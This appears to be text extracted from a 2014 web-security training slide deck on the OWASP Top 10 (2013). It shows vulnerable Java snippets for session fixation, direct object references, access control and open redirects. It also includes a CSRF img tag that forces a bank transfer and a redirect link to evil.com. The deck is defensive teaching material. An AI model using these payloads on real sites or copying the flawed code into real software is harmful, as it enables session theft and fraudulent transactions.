2. SCHEDULE FOR THE DAY
1. Why are we here?
2. Real Life Examples
3. Owasp – Top 10 (2013)
4. Demo Web Hacking Simulation Walkthrough
5. Summary
6. Questions
3. DO WE NEED WEB APP.
SECURITY?
Well managed infrastructure
Important data on web applications
Malware spreading
20. A2 – SESSION FIXATION EXAMPLE
public class LoginServlet extends HttpServlet {
…
public void doPost(HttpServletRequest request,
HttpServletResponse response) {
String user = request.getParameter("user");
String pass = request.getParameter("password");
…
HttpSession session = request.getSession(true);
…
}
…
}
21. A2 – SESSION FIXATION EXAMPLE
public class LoginServlet extends HttpServlet {
…
public void doPost(HttpServletRequest request,
HttpServletResponse response) {
String user = request.getParameter("user");
String pass = request.getParameter("password");
…
HttpSession session = request.getSession(true);
…
}
…
}
22. A3 – CROSS-SITE SCRIPTING (XSS)
Untrusted data sent to victim without validation and / or
escaping
XSS allows attackers to execute script in browsers to:
hijacking users’ sessions,
redirecting user to malicious site,
…
1. Reflected XSS
2. Stored XSS
26. A4 – INSECURE DIRECT OBJECT REF.
Reference to internal object like
file,
directory,
database key
without
access control check,
other protection.
27. A4 –DIRECT OBJECT REF. EXAMPLE
String query = "select * from accounts where account = ?";
PreparedStatement stmt = conn.prepareStatement(query);
stmt.setString(1, request.getParameter("account"));
ResultSet rs = stmt.executeQuery();
28. A4 –DIRECT OBJECT REF. EXAMPLE
String query = "select * from accounts where account = ?";
PreparedStatement stmt = conn.prepareStatement(query);
stmt.setString(1, request.getParameter("account"));
ResultSet rs = stmt.executeQuery();
http://foo.com/app/accountInfo?account=notmyaccount
29. A5 – SECURITY MISCONFIGURATION
Secure configuration defined and deployed for the:
application,
frameworks,
application server,
web server,
database server,
platform.
33. A6 – SENSITIVE DATA EXPOSURE
Protect sensitive data such as
credit cards,
authentication credentials
…
Apply extra protection (encryption at rest or in transit) and
precautions when exchanged with browser.
34. A6 – DATA EXPOSURE EXAMPLE 1
An application encrypts credit card numbers in a database
using automatic database encryption.
However, this means it also decrypts this data
automatically when retrieved, allowing an SQL injection
flaw to retrieve credit card numbers in clear text.
35. A6 – DATA EXPOSURE EXAMPLE 2
A site simply doesn’t use SSL for all authenticated pages.
Attacker simply monitors network traffic (like an open
wireless network), and steals the user’s session cookie.
36. A7 – MISSING ACCESS CONTROL
Verify function level acces:
before making functionality visible in GUI ✓
when each function is accessed ✗
37. A7 – ACCESS CONTROL EXAMPLE
@Stateless
public class OrderBean implements Order {
public String getDetail(String id) {
…
}
public String approve(String id) {
…
}
…
}
38. A7 – ACCESS CONTROL EXAMPLE
@Stateless
public class OrderBean implements Order {
public String getDetail(String id) {
…
}
public String approve(String id) {
…
}
…
}
39. A8 – CROSS-SITE REQUEST FORGERY
2. User visits forum.com 1. User authenticates to bank.com
3. Page contains tag
<img
src=bank.com/transfer.jsp?account=atta
cker&amount=300000>
4. User’s browser makes GET request
bank.com/transfer.jsp?account=attacker&
amount=300000
without user knowing
40. A8 – CSRF EXAMPLE
Nearly everything is susceptible to CSRF, so no need to
hunt the bug …
41. A9 – USING VULNERABLE COMPONENTS
Common Vulnerabilities and Exposures database (https://cve.mitre.org)
42. A10 – UNVALIDATED REDIRECT
1. Lure the user into clicking a redirect link
http://www.trusted.com/redirector?to=http://www.evil.com
2. Code does not perform any validation
String location = (String) request.getParameter(« to »);
response.sendRedirect(location);
3. User thinks (s)he’s accessing trusted.com but is in fact
at evil.com
43. SUMMARY
LAYERS OF DEFENSE IN DEPTH
Policies, Procedures,
Awareness
Physical
Perimeter
Internal Network
Host
App
Data
44. AND NOW …
bWAPP
OWASP Top 10
CWE 25
Mitigations (SANS, OWASP Cheat Sheets, …)
Web Services (SOAP & REST)
Mobile
And more …
46. FOLLOW US ON …
nitroxis Nitroxis.BE
@Nitroxis_sprl
Nitroxis sprl
Training and Certification for
information Security
Professionals
47. ADD DEPTH TO YOUR INFORMATION SYSTEM
Olivier Houyoux Technology Security Architect
Version 1.1
Date 28/11/2014
Mail Contact (at) nitroxis.be
Website www.nitroxis.be